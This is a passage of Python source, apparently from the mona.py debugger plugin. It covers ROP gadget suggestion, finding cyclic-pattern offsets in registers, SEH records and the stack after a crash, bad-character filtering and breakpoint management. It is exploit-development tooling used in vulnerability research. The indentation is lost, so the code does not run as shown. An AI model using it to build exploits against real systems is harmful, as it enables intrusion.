moveptr_notallowed = ["ADD "+reg2, "ADC "+reg2, "POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# xor pointer into another pointer
# =================================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
xorptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "XCHG ", "ADC ","FPATAN", "TEST ", "CMP "]
xorptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:","PUSHAD","POPAD", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("XOR",reg,reg2,ropchains,xorptr_allowed,xorptr_notallowed))
# get stack pointer
# =================
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ","MOV ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP ESP","MOV ESP,","XCHG ESP,","XOR ESP","LEA ESP,","AND ESP", "ADD ESP", "],","SUB ESP","OR ESP"]
moveptr_notallowed.append("POP "+reg)
moveptr_notallowed.append("MOV "+reg)
moveptr_notallowed.append("XCHG "+reg)
moveptr_notallowed.append("XOR "+reg)
moveptr_notallowed.append("LEA "+reg)
moveptr_notallowed.append("AND "+reg)
suggestions = mergeOpcodes(suggestions,getRegToReg("MOVE","ESP",reg,allchains,moveptr_allowed,moveptr_notallowed))
# add something to register
# =========================
for reg in regs: #from
for reg2 in regs: #to
if reg != reg2:
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg2,"MOV "+reg2+",","XCHG "+reg2+",","XOR "+reg2,"LEA "+reg2+",","AND "+reg2,"DS:","SS:", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("ADD",reg,reg2,ropchains,moveptr_allowed,moveptr_notallowed))
# add value to register
# =========================
for reg in regs: #to
moveptr_allowed = ["NOP","RETN","POP ","INC ","DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP"]
suggestions = mergeOpcodes(suggestions,getRegToReg("ADDVAL",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#inc reg
# =======
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","INC " + reg,"DEC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "DEC "+reg]
suggestions = mergeOpcodes(suggestions,getRegToReg("INC",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#dec reg
# =======
for reg in regs:
moveptr_allowed = ["NOP","RETN","POP ","DEC " + reg,"INC ","OR ","XOR ","ADD ","PUSH ","AND ", "ADC ", "SUB ","FPATAN", "TEST ", "CMP "]
moveptr_notallowed = ["POP "+reg,"MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "INC "+reg]
suggestions = mergeOpcodes(suggestions,getRegToReg("DEC",reg,reg,ropchains,moveptr_allowed,moveptr_notallowed))
#popad reg
# =======
popad_allowed = ["POPAD","RETN","INC ","DEC ","OR ","XOR ","ADD ","AND ", "ADC ", "SUB ","FPATAN","POP ", "TEST ", "CMP "]
popad_notallowed = ["POP ESP","PUSH ESP","MOV ESP","ADD ESP", "INC ESP","DEC ESP","XOR ESP","LEA ESP","SS:","DS:"]
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find("POPAD") == 2:
if suggestedGadgetCheck(gadgetinstructions,popad_allowed,popad_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not "popad" in suggestions:
suggestions["popad"] = toadd
else:
suggestions["popad"] = mergeOpcodes(suggestions["popad"],toadd)
# pop
# ===
for reg in regs:
pop_allowed = "POP "+reg+" # RETN"
pop_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(pop_allowed) == 2:
resulthash = "pop "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
# check if we have a pop for each reg
for reg in regs:
r = reg.lower()
if not "pop "+r in suggestions:
pop_notallowed = ["MOV "+reg+",","XCHG "+reg+",","XOR "+reg,"LEA "+reg+",","DS:","SS:", "DEC ESP", "DEC "+reg, "INC " + reg,"PUSH ","XOR "+reg]
for rchain in ropchains:
rparts = ropchains[rchain].strip().split("#")
chainok = False
if rparts[1].strip() == "POP " + reg:
chainok = True
if chainok:
for rpart in rparts:
thisinstr = rpart.strip()
for pna in pop_notallowed:
if thisinstr.find(pna) > -1:
chainok = False
break
if chainok:
toadd = {}
toadd[rchain] = thisinstr
if not "pop " + r in suggestions:
suggestions["pop " + r] = toadd
else:
suggestions["pop " + r] = mergeOpcodes(suggestions["pop " + r],toadd)
# neg
# ===
for reg in regs:
neg_allowed = "NEG "+reg+" # RETN"
neg_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(neg_allowed) == 2:
resulthash = "neg "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
# empty
# =====
for reg in regs:
empty_allowed = ["XOR "+reg+","+reg+" # RETN","MOV "+reg+",FFFFFFFF # INC "+reg+" # RETN", "SUB "+reg+","+reg+" # RETN", "PUSH 0 # POP "+reg + " # RETN", "IMUL "+reg+","+reg+",0 # RETN"]
empty_notallowed = []
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
for empty in empty_allowed:
if gadgetinstructions.find(empty) == 2:
resulthash = "clear "+reg.lower()
toadd = {}
toadd[gadget] = gadgetinstructions
if not resulthash in suggestions:
suggestions[resulthash] = toadd
else:
suggestions[resulthash] = mergeOpcodes(suggestions[resulthash],toadd)
return suggestions
def getRegToReg(type,fromreg,toreg,ropchains,moveptr_allowed,moveptr_notallowed):
moveptr = []
instrwithout = ""
toreg = toreg.upper()
srcval = False
resulthash = ""
musthave = ""
if type == "MOVE":
moveptr.append("MOV "+toreg+","+fromreg)
moveptr.append("LEA "+toreg+","+fromreg)
#if not (fromreg == "ESP" or toreg == "ESP"):
moveptr.append("XCHG "+fromreg+","+toreg)
moveptr.append("XCHG "+toreg+","+fromreg)
moveptr.append("PUSH "+fromreg)
moveptr.append("ADD "+toreg+","+fromreg)
moveptr.append("ADC "+toreg+","+fromreg)
moveptr.append("XOR "+toreg+","+fromreg)
if type == "XOR":
moveptr.append("XOR "+toreg+","+fromreg)
if type == "ADD":
moveptr.append("ADD "+toreg+","+fromreg)
moveptr.append("ADC "+toreg+","+fromreg)
moveptr.append("XOR "+toreg+","+fromreg)
if type == "ADDVAL":
moveptr.append("ADD "+toreg+",")
moveptr.append("ADC "+toreg+",")
moveptr.append("XOR "+toreg+",")
moveptr.append("SUB "+toreg+",")
srcval = True
resulthash = "add value to " + toreg
if type == "INC":
moveptr.append("INC "+toreg)
resulthash = "inc " + toreg
if type == "DEC":
moveptr.append("DEC "+toreg)
resulthash = "dec " + toreg
results = {}
if resulthash == "":
resulthash = type +" "+fromreg+" -> "+toreg
resulthash = resulthash.lower()
for tocheck in moveptr:
origtocheck = tocheck
for gadget in ropchains:
gadgetinstructions = ropchains[gadget].strip()
if gadgetinstructions.find(tocheck) == 2:
moveon = True
if srcval:
#check if src is a value
inparts = gadgetinstructions.split(",")
if len(inparts) > 1:
subinparts = inparts[1].split(" ")
if isHexString(subinparts[0].strip()):
tocheck = tocheck + subinparts[0].strip()
else:
moveon = False
if moveon:
instrwithout = gadgetinstructions.replace(tocheck,"")
if tocheck == "PUSH "+fromreg:
popreg = instrwithout.find("POP "+toreg)
popall = instrwithout.find("POP")
#make sure pop matches push
nrpush = gadgetinstructions.count("PUSH ")
nrpop = gadgetinstructions.count("POP ")
pushpopmatch = False
if nrpop >= nrpush:
pushes = []
pops = []
ropparts = gadgetinstructions.split(" # ")
pushindex = 0
popindex = 0
cntpush = 0
cntpop = nrpush
for parts in ropparts:
if parts.strip() != "":
if parts.strip().find("PUSH ") > -1:
pushes.append(parts)
if parts.strip() == "PUSH "+fromreg:
cntpush += 1
if parts.strip().find("POP ") > -1:
pops.append(parts)
if parts.strip() == "POP "+toreg:
cntpop -= 1
if cntpush == cntpop:
#dbg.log("%s : POPS : %d, PUSHES : %d, pushindex : %d, popindex : %d" % (gadgetinstructions,len(pops),len(pushes),pushindex,popindex))
#dbg.log("push at %d, pop at %d" % (cntpush,cntpop))
pushpopmatch = True
if (popreg == popall) and instrwithout.count("POP "+toreg) == 1 and pushpopmatch:
toadd={}
toadd[gadget] = gadgetinstructions
if not resulthash in results:
results[resulthash] = toadd
else:
results[resulthash] = mergeOpcodes(results[resulthash],toadd)
else:
if suggestedGadgetCheck(instrwithout,moveptr_allowed,moveptr_notallowed):
toadd={}
toadd[gadget] = gadgetinstructions
if not resulthash in results:
results[resulthash] = toadd
else:
results[resulthash] = mergeOpcodes(results[resulthash],toadd)
tocheck = origtocheck
return results
def suggestedGadgetCheck(instructions,allowed,notallowed):
individual = instructions.split("#")
cnt = 0
allgood = True
toskip = False
while (cnt < len(individual)-1) and allgood: # do not check last one, which is the ending instruction
thisinstr = individual[cnt].upper()
if thisinstr.strip() != "":
toskip = False
foundinstruction = False
for notok in notallowed:
if thisinstr.find(notok) > -1:
toskip= True
if not toskip:
for ok in allowed:
if thisinstr.find(ok) > -1:
foundinstruction = True
allgood = foundinstruction
else:
allgood = False
cnt += 1
return allgood
def dumpMemoryToFile(address,size,filename):
"""
Dump 'size' bytes of memory to a file
Arguments:
address - the address where to read
size - the number of bytes to read
filename - the name of the file where to write the file
Return:
Boolean - True if the write succeeded
"""
WRITE_SIZE = 10000
dbg.log("Dumping %d bytes from address 0x%08x to %s..." % (size, address, filename))
out = open(filename,'wb')
# write by increments of 10000 bytes
current = 0
while current < size :
bytesToWrite = size - current
if ( bytesToWrite >= WRITE_SIZE):
bytes = dbg.readMemory(address+current,WRITE_SIZE)
out.write(bytes)
current += WRITE_SIZE
else:
bytes = dbg.readMemory(address+current,bytesToWrite)
out.write(bytes)
current += bytesToWrite
out.close()
return True
def checkSEHOverwrite(address, nseh, seh):
"""
Checks if the current SEH record is overwritten
with a cyclic pattern
Input : address of SEH record, nseh value, seh value
Returns : array. Non empty array = SEH is overwritten
Array contents :
[0] : type (normal, upper, lower, unicode)
[1] : offset to nseh
"""
pattypes = ["normal","upper","lower","unicode"]
overwritten = []
global silent
silent = True
fullpattern = createPattern(50000,{})
for pattype in pattypes:
regpattern = fullpattern
hexpat = toHex(seh)
hexpat = toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[0]+hexpat[1])
factor = 1
goback = 4
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat = dbg.readMemory(address,8)
hexpat = hexpat.replace('\x00','')
goback = 2
offset = regpattern.find(hexpat)-goback
thissize = 0
if offset > -1:
thepointer = MnPointer(address)
if thepointer.isOnStack():
thissize = getPatternLength(address+4,pattype)
if thissize > 0:
overwritten = [pattype,offset]
break
silent = False
return overwritten
def goFindMSP(distance = 0,args = {}):
"""
Finds all references to cyclic pattern in memory
Arguments:
None
Return:
Dictonary with results of the search operation
"""
results = {}
regs = dbg.getRegs()
criteria = {}
criteria["accesslevel"] = "*"
tofile = ""
global silent
oldsilent = silent
silent=True
fullpattern = createPattern(50000,args)
factor = 1
#are we attached to an application ?
if dbg.getDebuggedPid() == 0:
dbg.log("*** Attach to an application, and trigger a crash with a cyclic pattern ! ***",highlight=1)
return {}
#1. find beging of cyclic pattern in memory ?
patbegin = createPattern(6,args)
silent=oldsilent
pattypes = ["normal","unicode","lower","upper"]
if not silent:
dbg.log("[+] Looking for cyclic pattern in memory")
tofile += "[+] Looking for cyclic pattern in memory\n"
for pattype in pattypes:
dbg.updateLog()
searchPattern = []
#create search pattern
factor = 1
if pattype == "normal":
searchPattern.append([patbegin, patbegin])
if pattype == "unicode":
patbegin_unicode = ""
factor = 0.5
for pbyte in patbegin:
patbegin_unicode += pbyte + "\x00"
searchPattern.append([patbegin_unicode, patbegin_unicode])
if pattype == "lower":
searchPattern.append([patbegin.lower(), patbegin.lower()])
if pattype == "upper":
searchPattern.append([patbegin.upper(), patbegin.upper()])
#search
pointers = searchInRange(searchPattern,0,TOP_USERLAND,criteria)
memory={}
if len(pointers) > 0:
for ptrtypes in pointers:
for ptr in pointers[ptrtypes]:
#get size
thissize = getPatternLength(ptr,pattype,args)
if thissize > 0:
if not silent:
dbg.log(" Cyclic pattern (%s) found at 0x%s (length %d bytes)" % (pattype,toHex(ptr),thissize))
tofile += " Cyclic pattern (%s) found at 0x%s (length %d bytes)\n" % (pattype,toHex(ptr),thissize)
if not ptr in memory:
memory[ptr] = ([thissize,pattype])
#get distance from ESP
if "ESP" in regs:
thisesp = regs["ESP"]
thisptr = MnPointer(ptr)
if thisptr.isOnStack():
if ptr > thisesp:
if not silent:
dbg.log(" - Stack pivot between %d & %d bytes needed to land in this pattern" % (ptr-thisesp,ptr-thisesp+thissize))
tofile += " - Stack pivot between %d & %d bytes needed to land in this pattern\n" % (ptr-thisesp,ptr-thisesp+thissize)
if not "memory" in results:
results["memory"] = memory
#2. registers overwritten ?
if not silent:
dbg.log("[+] Examining registers")
registers = {}
registers_to = {}
for reg in regs:
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = toHex(regs[reg])
hexpatr = hexpat
factor = 1
hexpat = toAscii(hexpat[6]+hexpat[7])+toAscii(hexpat[4]+hexpat[5])+toAscii(hexpat[2]+hexpat[3])+toAscii(hexpat[0]+hexpat[1])
hexpatrev = toAscii(hexpatr[0]+hexpatr[1])+toAscii(hexpatr[2]+hexpatr[3])+toAscii(hexpatr[4]+hexpatr[5])+toAscii(hexpatr[6]+hexpatr[7])
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
regpattern = toUnicode(regpattern)
factor = 0.5
offset = regpattern.find(hexpat)
if offset > -1:
if pattype == "unicode":
offset = offset * factor
if not silent:
dbg.log(" %s contains %s pattern : 0x%s (offset %d)" % (reg,pattype,toHex(regs[reg]),offset))
tofile += " %s contains %s pattern : 0x%s (offset %d)\n" % (reg,pattype,toHex(regs[reg]),offset)
if not reg in registers:
registers[reg] = ([regs[reg],offset,pattype])
else:
# maybe it's reversed ?
offset = regpattern.find(hexpatrev)
if offset > -1:
if pattype == "unicode":
offset = offset * factor
if not silent:
dbg.log(" %s contains %s pattern (reversed) : 0x%s (offset %d)" % (reg,pattype,toHex(regs[reg]),offset))
tofile += " %s contains %s pattern (reversed) : 0x%s (offset %d)\n" % (reg,pattype,toHex(regs[reg]),offset)
if not reg in registers:
registers[reg] = ([regs[reg],offset,pattype])
# maybe register points into cyclic pattern
mempat = ""
try:
mempat = dbg.readMemory(regs[reg],4)
except:
pass
if mempat != "":
if pattype == "normal":
regpattern = fullpattern
if pattype == "upper":
regpattern = fullpattern.upper()
if pattype == "lower":
regpattern = fullpattern.lower()
if pattype == "unicode":
mempat = dbg.readMemory(regs[reg],8)
mempat = mempat.replace('\x00','')
offset = regpattern.find(mempat)
if offset > -1:
thissize = getPatternLength(regs[reg],pattype,args)
if thissize > 0:
if not silent:
dbg.log(" %s (0x%s) points at offset %d in %s pattern (length %d)" % (reg,toHex(regs[reg]),offset,pattype,thissize))
tofile += " %s (0x%s) points at offset %d in %s pattern (length %d)\n" % (reg,toHex(regs[reg]),offset,pattype,thissize)
if not reg in registers_to:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
# reversed ?
offset = regpattern.find(mempat[::-1])
if offset > -1:
thissize = getPatternLength(regs[reg],pattype,args)
if thissize > 0:
if not silent:
dbg.log(" %s (0x%s) points at offset %d in (reversed) %s pattern (length %d)" % (reg,toHex(regs[reg]),offset,pattype,thissize))
tofile += " %s (0x%s) points at offset %d in (reversed) %s pattern (length %d)\n" % (reg,toHex(regs[reg]),offset,pattype,thissize)
if not reg in registers_to:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
else:
registers_to[reg] = ([regs[reg],offset,thissize,pattype])
if not "registers" in results:
results["registers"] = registers
if not "registers_to" in results:
results["registers_to"] = registers_to
#3. SEH record overwritten ?
seh = {}
if not silent:
dbg.log("[+] Examining SEH chain")
tofile += "[+] Examining SEH chain\r\n"
thissehchain=dbg.getSehChain()
for chainentry in thissehchain:
address = chainentry[0]
sehandler = chainentry[1]
nseh = 0
nsehvalue = 0
nsehascii = ""
try:
nsehascii = dbg.readMemory(address,4)
nsehvalue = struct.unpack('<L',nsehascii)[0]
nseh = "%08x" % nsehvalue
except:
nseh = 0
sehandler = 0
if nseh != 0 :
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = nsehascii
factor = 1
takeout = 4
divide = 1
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
#get next 4 bytes too
nsehascii = dbg.readMemory(address,8)
hexpat = nsehascii.replace('\x00','')
takeout = 0
divide = 2
offset = regpattern.find(hexpat)
thissize = 0
if offset > -1:
thepointer = MnPointer(chainentry[0])
if thepointer.isOnStack():
thissize = getPatternLength(address+4,pattype)
if thissize > 0:
thissize = (thissize - takeout)/divide
if not silent:
dbg.log(" SEH record (nseh field) at 0x%s overwritten with %s pattern : 0x%s (offset %d), followed by %d bytes of cyclic data after the handler" % (toHex(chainentry[0]),pattype,nseh,offset,thissize))
tofile += " SEH record (nseh field) at 0x%s overwritten with %s pattern : 0x%s (offset %d), followed by %d bytes of cyclic data after the handler\n" % (toHex(chainentry[0]),pattype,nseh,offset,thissize)
if not chainentry[0]+4 in seh:
seh[chainentry[0]+4] = ([chainentry[1],offset,pattype,thissize])
if not "seh" in results:
results["seh"] = seh
stack = {}
stackcontains = {}
#4. walking stack
if "ESP" in regs:
curresp = regs["ESP"]
if not silent:
if distance == 0:
extratxt = "(entire stack)"
else:
extratxt = "(+- "+str(distance)+" bytes)"
dbg.log("[+] Examining stack %s - looking for cyclic pattern" % extratxt)
tofile += "[+] Examining stack %s - looking for cyclic pattern\n" % extratxt
# get stack this address belongs to
stacks = getStacks()
thisstackbase = 0
thisstacktop = 0
if distance < 1:
for tstack in stacks:
if (stacks[tstack][0] < curresp) and (curresp < stacks[tstack][1]):
thisstackbase = stacks[tstack][0]
thisstacktop = stacks[tstack][1]
else:
thisstackbase = curresp - distance
thisstacktop = curresp + distance + 8
stackcounter = thisstackbase
sign=""
if not silent:
dbg.log(" Walking stack from 0x%s to 0x%s (0x%s bytes)" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter)))
tofile += " Walking stack from 0x%s to 0x%s (0x%s bytes)\n" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter))
# stack contains part of a cyclic pattern ?
while stackcounter < thisstacktop-4:
espoffset = stackcounter - curresp
stepsize = 4
dbg.updateLog()
if espoffset > -1:
sign="+"
else:
sign="-"
cont = dbg.readMemory(stackcounter,4)
if len(cont) == 4:
contat = cont
if contat <> "":
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = contat
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat1 = dbg.readMemory(stackcounter,4)
hexpat2 = dbg.readMemory(stackcounter+4,4)
hexpat1 = hexpat1.replace('\x00','')
hexpat2 = hexpat2.replace('\x00','')
if hexpat1 == "" or hexpat2 == "":
#no unicode
hexpat = ""
break
else:
hexpat = hexpat1 + hexpat2
if len(hexpat) == 4:
offset = regpattern.find(hexpat)
currptr = stackcounter
if offset > -1:
thissize = getPatternLength(currptr,pattype)
offsetvalue = int(str(espoffset).replace("-",""))
if thissize > 0:
stepsize = thissize
if thissize/4*4 != thissize:
stepsize = (thissize/4*4) + 4
# align stack again
if not silent:
espoff = 0
espsign = "+"
if ((stackcounter + thissize) >= curresp):
espoff = (stackcounter + thissize) - curresp
else:
espoff = curresp - (stackcounter + thissize)
espsign = "-"
dbg.log(" 0x%s : Contains %s cyclic pattern at ESP%s0x%s (%s%s) : offset %d, length %d (-> 0x%s : ESP%s0x%s)" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,offset,thissize,toHex(stackcounter+thissize-1),espsign,rmLeading(toHex(espoff),"0")))
tofile += " 0x%s : Contains %s cyclic pattern at ESP%s0x%s (%s%s) : offset %d, length %d (-> 0x%s : ESP%s0x%s)\n" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,offset,thissize,toHex(stackcounter+thissize-1),espsign,rmLeading(toHex(espoff),"0"))
if not currptr in stackcontains:
stackcontains[currptr] = ([offsetvalue,sign,offset,thissize,pattype])
else:
#if we are close to ESP, change stepsize to 1
if offsetvalue <= 256:
stepsize = 1
stackcounter += stepsize
# stack has pointer into cyclic pattern ?
if not silent:
if distance == 0:
extratxt = "(entire stack)"
else:
extratxt = "(+- "+str(distance)+" bytes)"
dbg.log("[+] Examining stack %s - looking for pointers to cyclic pattern" % extratxt)
tofile += "[+] Examining stack %s - looking for pointers to cyclic pattern\n" % extratxt
# get stack this address belongs to
stacks = getStacks()
thisstackbase = 0
thisstacktop = 0
if distance < 1:
for tstack in stacks:
if (stacks[tstack][0] < curresp) and (curresp < stacks[tstack][1]):
thisstackbase = stacks[tstack][0]
thisstacktop = stacks[tstack][1]
else:
thisstackbase = curresp - distance
thisstacktop = curresp + distance + 8
stackcounter = thisstackbase
sign=""
if not silent:
dbg.log(" Walking stack from 0x%s to 0x%s (0x%s bytes)" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter)))
tofile += " Walking stack from 0x%s to 0x%s (0x%s bytes)\n" % (toHex(stackcounter),toHex(thisstacktop-4),toHex(thisstacktop-4-stackcounter))
while stackcounter < thisstacktop-4:
espoffset = stackcounter - curresp
dbg.updateLog()
if espoffset > -1:
sign="+"
else:
sign="-"
cont = dbg.readMemory(stackcounter,4)
if len(cont) == 4:
cval=""
for sbytes in cont:
tval = hex(ord(sbytes)).replace("0x","")
if len(tval) < 2:
tval="0"+tval
cval = tval+cval
try:
contat = dbg.readMemory(hexStrToInt(cval),4)
except:
contat = ""
if contat <> "":
for pattype in pattypes:
dbg.updateLog()
regpattern = fullpattern
hexpat = contat
if pattype == "upper":
regpattern = regpattern.upper()
if pattype == "lower":
regpattern = regpattern.lower()
if pattype == "unicode":
hexpat1 = dbg.readMemory(stackcounter,4)
hexpat2 = dbg.readMemory(stackcounter+4,4)
hexpat1 = hexpat1.replace('\x00','')
hexpat2 = hexpat2.replace('\x00','')
if hexpat1 == "" or hexpat2 == "":
#no unicode
hexpat = ""
break
else:
hexpat = hexpat1 + hexpat2
if len(hexpat) == 4:
offset = regpattern.find(hexpat)
currptr = hexStrToInt(cval)
if offset > -1:
thissize = getPatternLength(currptr,pattype)
if thissize > 0:
offsetvalue = int(str(espoffset).replace("-",""))
if not silent:
dbg.log(" 0x%s : Pointer into %s cyclic pattern at ESP%s0x%s (%s%s) : 0x%s : offset %d, length %d" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,toHex(currptr),offset,thissize))
tofile += " 0x%s : Pointer into %s cyclic pattern at ESP%s0x%s (%s%s) : 0x%s : offset %d, length %d\n" % (toHex(stackcounter),pattype,sign,rmLeading(toHex(offsetvalue),"0"),sign,offsetvalue,toHex(currptr),offset,thissize)
if not currptr in stack:
stack[currptr] = ([offsetvalue,sign,offset,thissize,pattype])
stackcounter += 4
else:
dbg.log("** Are you connected to an application ?",highlight=1)
if not "stack" in results:
results["stack"] = stack
if not "stackcontains" in results:
results["stackcontains"] = stack
if tofile != "":
objfindmspfile = MnLog("findmsp.txt")
findmspfile = objfindmspfile.reset()
objfindmspfile.write(tofile,findmspfile)
return results
#-----------------------------------------------------------------------#
# convert arguments to criteria
#-----------------------------------------------------------------------#
def args2criteria(args,modulecriteria,criteria):
thisversion,thisrevision = getVersionInfo(inspect.stack()[0][1])
thisversion = thisversion.replace("'","")
dbg.logLines("\n---------- Mona command started on %s (v%s, rev %s) ----------" % (datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),thisversion,thisrevision))
dbg.log("[+] Processing arguments and criteria")
global ptr_to_get
# meets access level ?
criteria["accesslevel"] = "X"
if "x" in args :
if not args["x"].upper() in ["*","R","RW","RX","RWX","W","WX","X"]:
dbg.log("invalid access level : %s" % args["x"], highlight=1)
criteria["accesslevel"] = ""
else:
criteria["accesslevel"] = args["x"].upper()
dbg.log(" - Pointer access level : %s" % criteria["accesslevel"])
# query OS modules ?
if "o" in args and args["o"]:
modulecriteria["os"] = False
dbg.log(" - Ignoring OS modules")
# allow nulls ?
if "n" in args and args["n"]:
criteria["nonull"] = True
dbg.log(" - Ignoring pointers that have null bytes")
# override list of modules to query ?
if "m" in args:
if type(args["m"]).__name__.lower() <> "bool":
modulecriteria["modules"] = args["m"]
dbg.log(" - Only querying modules %s" % args["m"])
# limit nr of pointers to search ?
if "p" in args:
if str(args["p"]).lower() != "true":
ptr_to_get = int(args["p"].strip())
if ptr_to_get > 0:
dbg.log(" - Maximum nr of pointers to return : %d" % ptr_to_get)
# only want to see specific type of pointers ?
if "cp" in args:
ptrcriteria = args["cp"].split(",")
for ptrcrit in ptrcriteria:
ptrcrit=ptrcrit.strip("'")
ptrcrit=ptrcrit.strip('"').lower().strip()
criteria[ptrcrit] = True
dbg.log(" - Pointer criteria : %s" % ptrcriteria)
if "cpb" in args:
badchars = args["cpb"]
badchars = badchars.replace("'","")
badchars = badchars.replace('"',"")
badchars = badchars.replace("\\x","")
# see if we need to expand ..
bpos = 0
newbadchars = ""
while bpos < len(badchars):
curchar = badchars[bpos]+badchars[bpos+1]
if curchar == "..":
pos = bpos
if pos > 1 and pos <= len(badchars)-4:
# get byte before and after ..
bytebefore = badchars[pos-2] + badchars[pos-1]
byteafter = badchars[pos+2] + badchars[pos+3]
bbefore = int(bytebefore,16)
bafter = int(byteafter,16)
insertbytes = ""
bbefore += 1
while bbefore < bafter:
insertbytes += "%02x" % bbefore
bbefore += 1
newbadchars += insertbytes
else:
newbadchars += curchar
bpos += 2
badchars = newbadchars
cnt = 0
strb = ""
while cnt < len(badchars):
strb=strb+binascii.a2b_hex(badchars[cnt]+badchars[cnt+1])
cnt=cnt+2
criteria["badchars"] = strb
dbg.log(" - Bad char filter will be applied to pointers : %s " % args["cpb"])
if "cm" in args:
modcriteria = args["cm"].split(",")
for modcrit in modcriteria:
modcrit=modcrit.strip("'")
modcrit=modcrit.strip('"').lower().strip()
#each criterium has 1 or 2 parts : criteria=value
modcritparts = modcrit.split("=")
try:
if len(modcritparts) < 2:
# set to True, no value given
modulecriteria[modcritparts[0].strip()] = True
else:
# read the value
modulecriteria[modcritparts[0].strip()] = (modcritparts[1].strip() == "true")
except:
continue
if (inspect.stack()[1][3] == "procShowMODULES"):
modcriteria = args["cm"].split(",")
for modcrit in modcriteria:
modcrit=modcrit.strip("'")
modcrit=modcrit.strip('"').lower().strip()
if modcrit.startswith("+"):
modulecriteria[modcrit]=True
else:
modulecriteria[modcrit]=False
dbg.log(" - Module criteria : %s" % modcriteria)
return modulecriteria,criteria
#manage breakpoint on selected exported/imported functions from selected modules
def doManageBpOnFunc(modulecriteria,criteria,funcfilter,mode="add",type="export"):
"""
Sets a breakpoint on selected exported/imported functions from selected modules
Arguments :
modulecriteria - Dictionary
funcfilter - comma separated string indicating functions to set bp on
must contains "*" to select all functions
mode - "add" to create bp's, "del" to remove bp's
Returns : nothing
"""
type = type.lower()
namecrit = funcfilter.split(",")
if mode == "add" or mode == "del" or mode == "list":
if not silent:
dbg.log("[+] Enumerating %sed functions" % type)
modulestosearch = getModulesToQuery(modulecriteria)
bpfuncs = {}
for thismodule in modulestosearch:
if not silent:
dbg.log(" Querying module %s" % thismodule)
# get all
themod = dbg.getModule(thismodule)
tmod = MnModule(thismodule)
shortname = tmod.getShortName()
syms = themod.getSymbols()
# get funcs
funcs = {}
if type == "export":
funcs = tmod.getEAT()
else:
funcs = tmod.getIAT()
if not silent:
dbg.log(" Total nr of %sed functions : %d" % (type,len(funcs)))
for func in funcs:
if meetsCriteria(MnPointer(func), criteria):
funcname = funcs[func].lower()
setbp = False
if "*" in namecrit:
setbp = True
else:
for crit in namecrit:
crit = crit.lower()
tcrit = crit.replace("*","")
if (crit.startswith("*") and crit.endswith("*")) or (crit.find("*") == -1):
if funcname.find(tcrit) > -1:
